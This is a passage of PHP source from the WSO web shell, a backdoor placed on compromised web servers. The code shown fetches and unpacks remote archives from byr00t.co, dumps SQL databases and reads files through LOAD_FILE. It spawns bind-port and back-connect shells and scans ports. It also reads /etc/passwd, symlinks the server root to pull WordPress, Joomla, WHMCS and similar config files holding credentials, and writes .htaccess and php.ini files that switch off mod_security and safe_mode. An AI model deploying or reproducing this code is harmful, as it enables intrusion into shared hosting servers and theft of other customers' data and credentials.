width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> \r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> (".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form><br>\';\r\n if(isset($_POST[\'p1\'])) { function cf($f,$t) { $w=@fopen($f,"w") or @function_exists(\'file_put_contents\');\r\n if($w) { @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));\r\n @fclose($w);\r\n } } if($_POST[\'p1\'] == \'bpc\') { cf("/tmp/bp.c",$bind_port_c);\r\n $out = ex("gcc -o /tmp/bp /tmp/bp.c");\r\n @unlink("/tmp/bp.c");\r\n $out .= ex("/tmp/bp ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp")."</pre>";\r\n } if($_POST[\'p1\'] == \'bpp\') { cf("/tmp/bp.pl",$bind_port_p);\r\n $out = ex(which("perl")." /tmp/bp.pl ".$_POST[\'p2\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bp.pl")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcc\') { cf("/tmp/bc.c",$back_connect_c);\r\n $out = ex("gcc -o /tmp/bc /tmp/bc.c");\r\n @unlink("/tmp/bc.c");\r\n $out .= ex("/tmp/bc ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc")."</pre>";\r\n } if($_POST[\'p1\'] == \'bcp\') { cf("/tmp/bc.pl",$back_connect_p);\r\n $out = ex(which("perl")." /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." &");\r\n echo "<pre class=ml1>$out\\n".ex("ps aux | grep bc.pl")."</pre>";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionPortScanner() { printHeader();\r\n echo \'<h1>Port Scanner</h1>\';\r\n echo \'<div class="content">\';\r\n echo \'<form action="" method="post">\';\r\n if(isset($_POST[\'host\']) && is_numeric($_POST[\'end\']) && is_numeric($_POST[\'start\'])){ $start = strip_tags($_POST[\'start\']);\r\n $end = strip_tags($_POST[\'end\']);\r\n $host = strip_tags($_POST[\'host\']);\r\n for($i = $start;\r\n $i<=$end;\r\n $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3);\r\n if($fp){ echo \'Port \'.$i.\' is <font color=green>open</font><br>\';\r\n } flush();\r\n } } else { echo \'<br /><br /><center><input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">\r\n <input type="hidden" name="c" value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type="hidden" name="charset" value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n Host: <input type="text" name="host" value="localhost"/><br /><br />\r\n Port start: <input type="text" name="start" value="0"/><br /><br />\r\n Port end:<input type="text" name="end" value="5000"/><br /><br />\r\n <input type="submit" value="Scan Ports" />\r\n </form></center><br /><br />\';\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionReadable() { printHeader();\r\n echo \'<h1>Readable Dirs</h1>\';\r\n echo \'<div class="content">\';\r\n $sm = ini_get(\'safe_mode\');\r\n if($sm) { echo \'<br /><b>Error: safe_mode = on</b><br /><br />\';\r\n } else { @$passwd = fopen(\'/etc/passwd\',\'r\');\r\n if (!$passwd) { echo \'<br /><b>[-] Error : coudn`t read /etc/passwd</b><br /><br />\';\r\n } else { $pub = array();\r\n $users = array();\r\n $conf = array();\r\n $i = 0;\r\n while(!feof($passwd)) { $str = fgets($passwd);\r\n if ($i > 35) { $pos = strpos($str,\':\');\r\n $username = substr($str,0,$pos);\r\n $dirz = \'/home/\'.$username.\'/public_html/\';\r\n if (($username != \'\')) { if (is_readable($dirz)) { array_push($users,$username);\r\n array_push($pub,$dirz);\r\n } } } $i++;\r\n } echo \'<br><br>\';\r\n echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\\n"."<br />";\r\n echo "[+] Founded ".sizeof($pub)." readable public_html directories\\n"."<br /><br /><br />";\r\n foreach ($users as $user) { $path = "/home/$user/public_html/";\r\n echo $path."<br>";\r\n } echo "<br /><br /><br />[+] Complete...\\n"."<br />";\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionSymlink() { printHeader();\r\n echo \'<h1>Symlink</h1>\';\r\n $furl = \'http://\'.$_SERVER[\'SERVER_NAME\'].$_SERVER[\'REQUEST_URI\'];\r\n $expld = explode(\'/\',$furl );\r\n $burl =str_replace(end($expld),\'\',$furl);\r\n echo \'<div class="content"><center>\r\n <h3>[ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'website\\\',null)">Domains</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'whole\\\',null)">Whole Server Symlink</a> ] - \r\n [ <a href="#" onclick="g(\\\'symlink\\\',null,\\\'config\\\',null)">Config files symlink</a> ]</h3></center>\';\r\n if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'website\') { echo "<center>";\r\n $d0mains = @file("/etc/named.conf");\r\n if(!$d0mains){ echo "<pre class=ml1 style=\'margin-top:5px\'>Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=center class=\'main\' border=0 ><tr><th> Count </th><th> Domains </th><th> Users </th></tr>";\r\n $unk = array();\r\n foreach($d0mains as $d0main){ if(@eregi("zone",$d0main)){ preg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\n flush();\r\n if(strlen(trim($domains[1][0])) > 2){ $unk[] = $domains[1][0];\r\n flush();\r\n } } } $count=1;\r\n $unk = array_unique($unk);\r\n $l=0;\r\n foreach($unk as $d){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$d));\r\n echo "<tr".($l?\' class=l1\':\'\')."><td>".$count."</td><td><a href=http://".$d."/>".$d."</a></td><td>".$user[\'name\']."</td></tr>";\r\n flush();\r\n $count++;\r\n $l=$l?0:1;\r\n } echo "</table>";\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'whole\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp =@fopen (\'sym/.htaccess\',\'w\');\r\n fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\'><tr><th> Count </th><th> Domains </th><th> User </th><th> Symlink </th></tr>";\r\n $count=1;\r\n $mck = array();\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0])) >2){ $mck[] = $domain[1][0];\r\n } } } $mck = array_unique($mck);\r\n $l=0;\r\n foreach($mck as $d) { $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$d));\r\n $ddt = $user[\'name\'];\r\n $ddt = $d;\r\n if(@eregi("\\.ir",$d) or @eregi("\\.il",$d)) { $ddt = "<div style=\' color: #FF0000 ;\r\n text-shadow: 0px 0px 1px red;\r\n \'>".$d.\'</div>\';\r\n } echo "<tr".($l?\' class=l1\':\'\')."><td>".$count++."</td><td><a target=\'_blank\' href=http://".$d.\'/>\'.$ddt.\' </a></td><td>\'.$user[\'name\']."</td><td><a href=\'sym/root/home/".$user[\'name\']."/public_html\' target=\'_blank\'>symlink </a></td></tr>";\r\n flush();\r\n $l=$l?0:1;\r\n } echo \'</table>\';\r\n } echo "</center>";\r\n } if(isset($_POST[\'p1\']) && $_POST[\'p1\']==\'config\') { echo "<center>";\r\n @mkdir(\'sym\',0777);\r\n $hdt = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $hfp = @fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($hfp ,$hdt);\r\n if(function_exists(\'symlink\')) { @symlink(\'/\',\'sym/root\');\r\n } $d0mains = @file(\'/etc/named.conf\');\r\n if(!$d0mains) { echo "<pre class=ml1 style=\'margin-top:5px\'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";\r\n } else { echo "<table align=\'center\' width=\'40%\' class=\'main\' ><tr><th> Count </th><th> Domains </th><th> Script </th></tr>";\r\n $count = 1;\r\n $l=0;\r\n foreach($d0mains as $d0main){ if(@eregi(\'zone\',$d0main)){ preg_match_all(\'#zone "(.*)"#\',$d0main,$domain);\r\n flush();\r\n if(strlen(trim($domain[1][0]))>2){ $user = posix_getpwuid(@fileowner(\'/etc/valiases/\'.$domain[1][0]));\r\n $c1 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/wp-config.php\';\r\n $ch01 = get_headers($c1);\r\n $cf01 = $ch01[0];\r\n $c2 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/blog/wp-config.php\';\r\n $ch02 = get_headers($c2);\r\n $cf02 = $ch02[0];\r\n $c3 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/configuration.php\';\r\n $ch03 = get_headers($c3);\r\n $cf03 = $ch03[0];\r\n $c4 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/joomla/configuration.php\';\r\n $ch04 = get_headers($c4);\r\n $cf04 = $ch04[0];\r\n $c5 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/config.php\';\r\n $ch05 = get_headers($c5);\r\n $cf05 = $ch05[0];\r\n $c6 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/vb/includes/config.php\';\r\n $ch06 = get_headers($c6);\r\n $cf06 = $ch06[0];\r\n $c7 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/forum/includes/config.php\';\r\n $ch07 = get_headers($c7);\r\n $cf07 = $ch07[0];\r\n $c8 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'public_html/clients/configuration.php\';\r\n $ch08 = get_headers($c8);\r\n $cf08 = $ch08[0];\r\n $c9 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/support/configuration.php\';\r\n $ch09 = get_headers($c9);\r\n $cf09 = $ch09[0];\r\n $c10 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch10 = get_headers($c10);\r\n $cf10 = $ch10[0];\r\n $c11 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/submitticket.php\';\r\n $ch11 = get_headers($c11);\r\n $cf11 = $ch11[0];\r\n $c12 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/client/configuration.php\';\r\n $ch12 = get_headers($c12);\r\n $cf12 = $ch12[0];\r\n $c13 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/includes/configure.php\';\r\n $ch13 = get_headers($c13);\r\n $cf13 = $ch13[0];\r\n $c14 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/include/app_config.php\';\r\n $ch14 = get_headers($c14);\r\n $cf14 = $ch14[0];\r\n $c15 = $burl.\'/sym/root/home/\'.$user[\'name\'].\'/public_html/sites/default/settings.php\';\r\n $ch15 = get_headers($c15);\r\n $cf15 = $ch15[0];\r\n $out = \' \r\n\';\r\n if(strpos($cf01,\'200\') == true) { $out = "<a href=\'".$c1."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf02,\'200\') == true) { $out = "<a href=\'".$c2."\' target=\'_blank\'>Wordpress</a>";\r\n } elseif(strpos($cf03,\'200\') == true && strpos($cf11,\'200\') == true) { $out = " <a href=\'".$c11."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf09,\'200\') == true) { $out = " <a href=\'".$c9."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf10,\'200\') == true) { $out = " <a href=\'".$c10."\' target=\'_blank\'>WHMCS</a>";\r\n } elseif(strpos($cf03,\'200\') == true) { $out = " <a href=\'".$c3."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf04,\'200\') == true) { $out = " <a href=\'".$c4."\' target=\'_blank\'>Joomla</a>";\r\n } elseif(strpos($cf05,\'200\') == true) { $out = " <a href=\'".$c5."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf06,\'200\') == true) { $out = " <a href=\'".$c6."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf07,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>vBulletin</a>";\r\n } elseif(strpos($cf08,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf12,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Client Area</a>";\r\n } elseif(strpos($cf13,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>osCommerce/Zen Cart</a>";\r\n } elseif(strpos($cf14,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Magento</a>";\r\n } elseif(strpos($cf15,\'200\') == true) { $out = " <a href=\'".$c7."\' target=\'_blank\'>Drupal</a>";\r\n } else { continue;\r\n } echo \'<tr\'.($l?\' class=l1\':\'\').\'><td>\'.$count++.\'</td><td><a href=http://www.\'.$domain[1][0].\'/>\'.$domain[1][0].\'</a></td><td>\'.$user[\'name\'].\'</td><td>\'.$out.\'</td></tr>\';\r\n flush();\r\n $l=$l?0:1;\r\n } } } echo "</table>";\r\n } echo "</center>";\r\n } echo "</div>";\r\n printFooter();\r\n } function actionSafeMode() { printHeader();\r\n echo \'<h1>Safe Mode</h1>\';\r\n echo \'<div class="content">\';\r\n echo "<div class=header><center><h3><span>| SAFE MODE AND MOD SECURITY DISABLED AND PERL 500 INTERNAL ERROR BYPASS |</span></h3>Following php.ini and .htaccess(mod) and perl(.htaccess)[convert perl extention *.pl => *.sh ] files create in following dir<br>| ".$GLOBALS[\'cwd\']." |<br><br />";\r\n echo \'<a href=# onclick="g(null,null,\\\'php.ini\\\',null)">| PHP.INI | </a><a href=# onclick="g(null,null,null,\\\'ini\\\')">| .htaccess(Mod) | </a><a href=# onclick="g(null,null,null,null,\\\'sh\\\')">| .htaccess(perl) | </a></center>\';\r\n if(!empty($_POST[\'p2\']) && isset($_POST[\'p2\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'<IfModule mod_security.c>\r\n Sec------Engine Off\r\n Sec------ScanPOST Off\r\n </IfModule>\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p1\'])&& isset($_POST[\'p1\'])) { $fil=fopen($GLOBALS[\'cwd\']."php.ini","w");\r\n fwrite($fil,\'safe_mode=OFF\r\n disable_functions=NONE\');\r\n fclose($fil);\r\n } if(!empty($_POST[\'p3\']) && isset($_POST[\'p3\'])) { $fil=fopen($GLOBALS[\'cwd\'].".htaccess","w");\r\n fwrite($fil,\'Options FollowSymLinks MultiViews Indexes ExecCGI\r\n AddType application/x-httpd-cgi .sh\r\n AddHandler cgi-script .pl\r\n AddHandler cgi-script .pl\');\r\n fclose($fil);\r\n } echo "<br><br /><br /></div>";\r\n echo \'</div>\';\r\n printFooter();\r\n} function actionSQLBUDDY(){ printHeader();\r\n if(!file_exists(\'yazilimlar/sqlbuddy/index.php\')){ $dizin = \'https://byr00t.co/vb/sqlbuddy.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? $name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "sqlbuddy");\r\n $zip = new ZipArchive();\r\n $file = \'sqlbuddy.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'yazilimlar/\');\r\n if(file_exists(\'sqlbuddy.zip\')){ @unlink(\'sqlbuddy.zip\');\r\n } if($cikar){ echo "<iframe 